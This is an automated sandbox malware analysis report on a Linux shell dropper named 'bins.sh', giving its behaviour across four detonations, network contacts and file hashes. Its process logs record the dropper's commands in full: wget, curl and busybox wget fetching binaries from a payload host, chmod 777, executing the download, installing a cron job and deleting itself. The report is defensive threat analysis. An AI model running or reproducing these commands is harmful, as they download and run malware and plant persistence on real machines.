Malware Analysis Report

2025-05-28 16:02

Sample ID 241204-y7jrzszkcx
Target bins.sh
SHA256 5712c96a6f61d81d03e6fadb1ab213cbced525bc1548981318d3dfe47f03c9c6
Tags
discovery antivm defense_evasion execution persistence privilege_escalatio
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

5712c96a6f61d81d03e6fadb1ab213cbced525bc1548981318d3dfe47f03c9c6

Threat Level: Shows suspicious behavior

The file bins.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

discovery antivm defense_evasion execution persistence privilege_escalatio

File and Directory Permissions Modification

Executes dropped EXE

Renames itself

Creates/modifies Cron job

Enumerates running processes

Checks CPU configuration

Reads runtime system information

System Network Configuration Discovery

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-12-04 20:25

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-04 20:25

Reported

2024-12-04 20:28

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

149s

Max time network

131s

Command Line

[/tmp/bins.sh]

Signatures

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
GB 195.181.164.14:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 84.17.50.9:443 1527653184.rsc.cdn77.org tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-04 20:25

Reported

2024-12-04 20:28

Platform

debian9-armhf-20240611-en

Max time kernel

149s

Max time network

7s

Command Line

[/tmp/bins.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-12-04 20:25

Reported

2024-12-04 20:28

Platform

debian9-mipsbe-20240611-en

Max time kernel

150s

Max time network

154s

Command Line

[/tmp/bins.sh]

Signatures

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c /usr/bin/wget N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp

Files

/tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c

MD5 6c583043d91c55aa470c08c87058e917
SHA1 abf65a5b9bba69980278ad09356e53de8bb89439
SHA256 2d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948
SHA512 82ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5

Analysis: behavioral4

Detonation Overview

Submitted

2024-12-04 20:25

Reported

2024-12-04 20:28

Platform

debian9-mipsel-20240226-en

Max time kernel

150s

Max time network

152s

Command Line

[/tmp/bins.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A

Renames itself

Description Indicator Process Target
N/A N/A /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.FUV38W /usr/bin/crontab N/A

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/9/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/16/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/684/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/115/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/485/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/828/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/12/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/14/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/19/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/79/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/831/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/18/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/23/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/105/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/13/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/144/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/37/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/372/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/705/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/1/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/7/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/2/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/20/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/36/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/73/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/704/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/385/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/6/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/70/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/76/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/317/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/343/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/707/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/74/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/152/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/344/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/408/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/69/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/224/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/311/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/373/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/825/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/17/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/21/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/22/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/78/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/116/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/384/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/829/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/4/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/5/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/15/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/83/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/168/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/703/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/710/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/826/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/3/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/8/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/24/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A
File opened for reading /proc/77/cmdline /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c /usr/bin/wget N/A
File opened for modification /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c /usr/bin/curl N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c]

/bin/chmod

[chmod 777 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c]

/tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c

[./3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c]

/bin/sh

[sh -c crontab -l]

/usr/bin/crontab

[crontab -l]

/bin/sh

[sh -c crontab -]

/usr/bin/crontab

[crontab -]

/bin/rm

[rm 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/xo4idlUJaiiPjiiOV0cIUd0SGi73SQhZV8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/xo4idlUJaiiPjiiOV0cIUd0SGi73SQhZV8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/xo4idlUJaiiPjiiOV0cIUd0SGi73SQhZV8]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:443 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp

Files

/tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c

MD5 6c583043d91c55aa470c08c87058e917
SHA1 abf65a5b9bba69980278ad09356e53de8bb89439
SHA256 2d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948
SHA512 82ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5

/var/spool/cron/crontabs/tmp.FUV38W

MD5 7efe52b2de6e71ac50b770cf32218aac
SHA1 ade25d2ddfbbbf690febf439ab6c9be4b484d402
SHA256 c81fa91db4d9fa0605ef5576fa0e3bc4fb94f0ece0fa242c1e8fabf826f91d15
SHA512 f96c20247d84eed1819b80526f6671b3350cd908be62eda99e9392e0716735ba9b3b43f54bbf314ee1b188cdfb6bc1e21d16f27e10d52ef01b0bb57f3d74604f